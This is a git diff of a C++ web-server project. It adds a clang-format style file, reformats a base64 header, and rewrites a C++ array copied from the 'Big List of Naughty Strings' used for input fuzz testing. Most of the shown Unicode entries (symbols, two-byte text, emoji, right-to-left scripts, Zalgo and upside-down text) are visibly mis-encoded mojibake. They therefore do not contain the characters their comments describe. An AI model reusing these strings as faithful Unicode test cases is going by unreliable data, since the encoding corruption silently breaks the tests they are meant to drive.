diff options
-rw-r--r-- | .clang-format | 90 | ||||
-rw-r--r-- | include/base64.hpp | 5 | ||||
-rw-r--r-- | include/big_list_of_naughty_strings.hpp | 1149 | ||||
-rw-r--r-- | include/color_cout_g3_sink.hpp | 41 | ||||
-rw-r--r-- | include/crow_g3_logger.hpp | 116 | ||||
-rw-r--r-- | include/ssl_key_handler.hpp | 274 | ||||
-rw-r--r-- | include/token_authorization_middleware.hpp | 24 | ||||
-rw-r--r-- | include/webassets.hpp | 14 | ||||
-rw-r--r-- | src/base64.cpp | 143 | ||||
-rw-r--r-- | src/base64_test.cpp | 92 | ||||
-rw-r--r-- | src/token_authorization_middleware.cpp | 79 | ||||
-rw-r--r-- | src/token_authorization_middleware_test.cpp | 36 | ||||
-rw-r--r-- | src/webserver_main.cpp | 30 |
13 files changed, 947 insertions, 1146 deletions
diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000000..4479e2d9d0 --- /dev/null +++ b/.clang-format @@ -0,0 +1,90 @@ +--- +Language: Cpp +# BasedOnStyle: Google +AccessModifierOffset: -1 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: false +AlignConsecutiveDeclarations: false +AlignEscapedNewlinesLeft: true +AlignOperands: true +AlignTrailingComments: true +AllowAllParametersOfDeclarationOnNextLine: true +AllowShortBlocksOnASingleLine: false +AllowShortCaseLabelsOnASingleLine: false +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: true +AllowShortLoopsOnASingleLine: true +AlwaysBreakAfterDefinitionReturnType: None +AlwaysBreakAfterReturnType: None +AlwaysBreakBeforeMultilineStrings: true +AlwaysBreakTemplateDeclarations: true +BinPackArguments: true +BinPackParameters: true +BraceWrapping: + AfterClass: false + AfterControlStatement: false + AfterEnum: false + AfterFunction: false + AfterNamespace: false + AfterObjCDeclaration: false + AfterStruct: false + AfterUnion: false + BeforeCatch: false + BeforeElse: false + IndentBraces: false +BreakBeforeBinaryOperators: None +BreakBeforeBraces: Attach +BreakBeforeTernaryOperators: true +BreakConstructorInitializersBeforeComma: false +ColumnLimit: 160 +CommentPragmas: '^ IWYU pragma:' +ConstructorInitializerAllOnOneLineOrOnePerLine: true +ConstructorInitializerIndentWidth: 4 +ContinuationIndentWidth: 4 +Cpp11BracedListStyle: true +DerivePointerAlignment: true +DisableFormat: false +ExperimentalAutoDetectBinPacking: false +ForEachMacros: [ foreach, Q_FOREACH, BOOST_FOREACH ] +IncludeCategories: + - Regex: '^<.*\.h>' + Priority: 1 + - Regex: '^<.*' + Priority: 2 + - Regex: '.*' + Priority: 3 +IndentCaseLabels: true +IndentWidth: 2 +IndentWrappedFunctionNames: false +KeepEmptyLinesAtTheStartOfBlocks: false +MacroBlockBegin: '' +MacroBlockEnd: '' +MaxEmptyLinesToKeep: 1 +NamespaceIndentation: None +ObjCBlockIndentWidth: 2 +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: false +PenaltyBreakBeforeFirstCallParameter: 1 +PenaltyBreakComment: 300 +PenaltyBreakFirstLessLess: 120 +PenaltyBreakString: 1000 +PenaltyExcessCharacter: 1000000 +PenaltyReturnTypeOnItsOwnLine: 200 +PointerAlignment: Left +ReflowComments: true +SortIncludes: true +SpaceAfterCStyleCast: false +SpaceBeforeAssignmentOperators: true +SpaceBeforeParens: ControlStatements +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 2 +SpacesInAngles: false +SpacesInContainerLiterals: true +SpacesInCStyleCastParentheses: false +SpacesInParentheses: false +SpacesInSquareBrackets: false +Standard: Auto +TabWidth: 8 +UseTab: Never +... + diff --git a/include/base64.hpp b/include/base64.hpp index f5ff338cae..e024d0a48f 100644 --- a/include/base64.hpp +++ b/include/base64.hpp @@ -3,7 +3,6 @@ namespace base64 { - bool base64_encode(const gsl::cstring_span<> &input, std::string &output); - bool base64_decode(const gsl::cstring_span<> &input, std::string &output); - +bool base64_encode(const gsl::cstring_span<> &input, std::string &output); +bool base64_decode(const gsl::cstring_span<> &input, std::string &output); }
\ No newline at end of file diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp index 4ba27f73e4..2d1ca0dd74 100644 --- a/include/big_list_of_naughty_strings.hpp +++ b/include/big_list_of_naughty_strings.hpp @@ -1,687 +1,464 @@ const std::string naughty_strings[] = { -// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt - -// Reserved Strings -// -// Strings which may be used elsewhere in code - -"undefined", -"undef", -"null", -"NULL", -"(null)", -"nil", -"NIL", -"true", -"false", -"True", -"False", -"TRUE", -"FALSE", -"None", -"hasOwnProperty", -"\\", -"\\\\", - -// Numeric Strings -// -// Strings which can be interpreted as numeric - -"0", -"1", -"1.00", -"$1.00", -"1/2", -"1E2", -"1E02", -"1E+02", -"-1", -"-1.00", -"-$1.00", -"-1/2", -"-1E2", -"-1E02", -"-1E+02", -"1/0", -"0/0", -"-2147483648/-1", -"-9223372036854775808/-1", -"-0", -"-0.0", -"+0", -"+0.0", -"0.00", -"0..0", -".", -"0.0.0", -"0,00", -"0,,0", -",", -"0,0,0", -"0.0/0", -"1.0/0.0", -"0.0/0.0", -"1,0/0,0", -"0,0/0,0", -"--1", -"-", -"-.", -"-,", -"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", -"NaN", -"Infinity", -"-Infinity", -"INF", -"1#INF", -"-1#IND", -"1#QNAN", -"1#SNAN", -"1#IND", -"0x0", -"0xffffffff", -"0xffffffffffffffff", -"0xabad1dea", -"123456789012345678901234567890123456789", -"1,000.00", -"1 000.00", -"1'000.00", -"1,000,000.00", -"1 000 000.00", -"1'000'000.00", -"1.000,00", -"1 000,00", -"1'000,00", -"1.000.000,00", -"1 000 000,00", -"1'000'000,00", -"01000", -"08", -"09", -"2.2250738585072011e-308", - -// Special Characters -// -// ASCII punctuation. All of these characters may need to be escaped in some -// contexts. Divided into three groups based on (US-layout) keyboard position. - -",./;'[]\\-=", -"<>?:\"{}|_+", -"!@#$%^&*()`~", - -// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, -// and U+007F (DEL) -// Often forbidden to appear in various text-based file formats (e.g. XML), -// or reused for internal delimiters on the theory that they should never -// appear in input. -// The next line may appear to be blank or mojibake in some viewers. -"", - -// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. -// Commonly misinterpreted as additional graphic characters. -// The next line may appear to be blank, mojibake, or dingbats in some viewers. -"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", - -// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode -// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), -// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often -// treated as whitespace in some contexts. -// This file unfortunately cannot express strings containing -// U+0000, U+000A, or U+000D (NUL, LF, CR). -// The next line may appear to be blank or mojibake in some viewers. -// The next line may be flagged for \"trailing whitespace\" in some viewers. -" "," ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", - -// Unicode additional control characters: all of the characters with -// general category Cf (in Unicode 8.0.0). -// The next line may appear to be blank or mojibake in some viewers. -"ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠタᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ", - -// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. -// The next two lines may appear to be blank or mojibake in some viewers. -"ᄏ", -"ᄒ", - -// Unicode Symbols -// -// Strings which contain common unicode symbols (e.g. smart quotes) - -"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", -"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", -"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", -"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", -"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", -"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", -"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", -"`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", -"¬ナロ¬ナワ¬ナン¬ナ゙", -"チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフヘホマ", -"ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", - -// Unicode Subscript/Superscript/Accents -// -// Strings which contain unicode subscripts/superscripts; can cause rendering issues - -"¬チᄚ¬チᄡ¬チᄉ", -"¬ツタ¬ツチ¬ツツ", -"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", -"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", - -// Quotation Marks -// -// Strings which contain misplaced quotation marks; can cause encoding errors - -"'", -"\"", -"''", -"\"\"", -"'\"'", -"\"''''\"'\"", -"\"'\"'\"''''\"", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タンbar¬タワ />", -"<foo val=`bar' />", - -// Two-Byte Characters -// -// Strings which contain two-byte characters: can cause rendering issues or character-length issues - -"ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", -" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", -"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", -"←テᄄ│ミᄑ₩ᅠᄐ", -"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", -"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ", -"ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", -"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", -"ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", - -// Changing length when lowercased -// -// Characters which increase in length (2 to 3 bytes) when lowercased -// Credit: https://twitter.com/jifa/status/625776454479970304 - -"ᄎ", -"ᄒ", - -// Japanese Emoticons -// -// Strings which consists of Japanese-style emoticons which are popular on the web - -" ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", -"(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", -"ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", -"__ᄒロ(,_,*)", -" ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", -"ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", -", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", -"(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", -"(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", -"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", -"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", - -// Emoji -// -// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always - -"゚リヘ", -"゚ムᄅ゚マᄑ", -"゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", -"゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", -"¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ ゚メル", -"¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", -"゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", -"0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ ゚ヤ゚", - -// Regional Indicator Symbols -// -// Regional Indicator Symbols can be displayed differently across -// fonts, and have a number of special behaviors - -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", - -// Unicode Numbers -// -// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric - -"ᄐムᄐメᄐモ", -"ᄀᄁᆪ", - -// Right-To-Left Strings -// -// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) - -"ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", -"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", -"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", -"ᄋᄑ", -"ᄋᄎ", -"ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", - -// Trick Unicode -// -// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) - -"¬タᆰ¬タᆰtest¬タᆰ", -"¬タᆱtest¬タᆱ", -"¬タᄅtest¬タᄅ", -"test¬チᅠtest¬タᆱ", -"¬チᆭtest¬チᄃ", - -// Zalgo Text -// -// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) - -"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", -"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", -"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", -"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", -"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", - -// Unicode Upsidedown -// -// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) - -"ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ ᆵᅦンᄍoᅨᆬ", 